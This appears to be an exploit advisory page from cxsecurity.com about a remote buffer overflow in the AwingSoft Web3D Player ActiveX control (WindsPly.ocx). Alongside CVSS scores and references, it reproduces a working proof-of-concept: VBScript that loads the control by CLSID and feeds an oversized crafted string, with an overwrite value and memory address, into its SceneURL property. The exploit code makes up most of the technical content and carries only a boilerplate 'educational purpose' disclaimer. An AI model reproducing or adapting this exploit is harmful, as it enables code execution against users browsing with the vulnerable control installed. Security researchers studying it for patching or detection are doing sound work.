AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow

2010-01-07 / 2010-01-08
Credit: shinnai
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

----------------------------------------------------------------------------- AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow url: http://www.awingsoft.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.net/ Dedicated to aaannamariaaa :D This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. File: WindsPly.ocx Ver.: <= 3.5.0.0 GUID: {17A54E7D-A9D4-11D8-9552-00E04CB09903} ProgID: WindsPlayerIE.View.1 Marked as: RegKey Safe for Script: Falso RegKey Safe for Init: Falso Implements IObjectSafety: Vero IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8 ----------------------------------------------------------------------------- <object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object> <script language='vbscript'> buff = String(8704, "A") mReg = unescape("bbbb") mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW buf1 = String(88, "c") buf2 = String(47284, "D") test.SceneURL = buff + mReg + mExc + buf1 + buf2 </script>

References:

http://xforce.iss.net/xforce/xfdb/51672
http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt
http://www.milw0rm.com/exploits/9116
http://secunia.com/advisories/35764


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top